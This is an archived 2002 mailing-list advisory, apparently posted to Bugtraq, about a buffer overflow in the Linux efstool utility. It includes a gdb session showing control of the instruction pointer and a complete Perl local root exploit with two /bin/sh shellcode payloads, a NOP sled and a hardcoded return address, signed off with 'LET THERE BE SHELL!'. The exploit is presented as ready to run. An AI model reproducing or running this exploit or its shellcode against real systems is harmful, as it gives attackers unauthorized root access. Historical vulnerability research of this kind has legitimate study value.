('binary' encoding is not supported, stored as-is) Ptrace Networks Security -------------------------- An error in the efstool program on redhat, mandrake, and slackware is able to be successfully exploited through a buffer overflow. [clorox@ptnw clorox]$ efstool `perl -e 'print "A" x 3000'` Segmentation fault [clorox@ptnw clorox]$ gdb efstool GNU gdb 5.1.1 Copyright 2002 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-mandrake-linux"...(no debugging symbols found)... (gdb) r `perl -e 'print "A" x 3000'` Starting program: /usr/bin/efstool `perl -e 'print "A" x 3000'` (no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)... (no debugging symbols found)...(no debugging symbols found)... Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () (gdb) info reg esp esp 0xbfffe890 0xbfffe890 (gdb) example: #!/usr/bin/perl # efstool root exploit # written by clorox of Ptrac Networks for BKACC(Bored Kids At ComputerCamp) # give the campers internet grogan! # # tested to work on slackware 8, mandrake 8, mandrake 7.1 # tweaks may be needed on the offset # method 1 works more often but # method 2 is faster but not too good # # # enjoy -clorox # perl efs.pl -1000 $shellcode = "\xeb\x1d\x5e\x29\xc0\x88\x46\x07\x89". "\x46\x0c\x89\x76\x08\xb0\x0b\x87\xf3". "\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x29". "\xc0\x40\xcd\x80\xe8\xde\xff\xff\xff". "/bin/sh"; $shellcode2 = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88". "\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3". "\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31". "\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff". "\xff\xff/bin/sh"; $ret = "0xbfffe890"; $offset = $ARGV[0]; $nop = "\x90"; if ($ARGV[1] eq "m1") { $len = 3000; for ($i = 0; $i < ($len - length($shellcode)); $i++) { $buffer .= $nop; } $buffer .= $shellcode; } elsif ($ARGV[1] eq "m2") { $len = 10010; for ($i = 0; $i < ($len - length($shellcode)); $i++) { $buffer .= $nop; } $buffer .= $shellcode2; } else { print "You must specify a method fool!\n"; print "perl $0 <offset> m1 or m2\n"; } $buffer .= pack('l', ($ret + $offset)); $buffer .= pack('l', ($ret + $offset)); exec("efstool $buffer"); # and on the seventh day clorox said "LET THERE BE SHELL!" and on a personal note, grogan, or any other admins of ceboston, the campers here deserve internet in our rooms, the computer labs arent condusive to doing research. as you can see we would use it for positive things such as posting to bug traq if you read this and want to talk it over talk to me im in room 105 in new dorm. -max
This archive was generated by hypermail 2b30 : Fri Jun 28 2002 - 21:40:33 PDT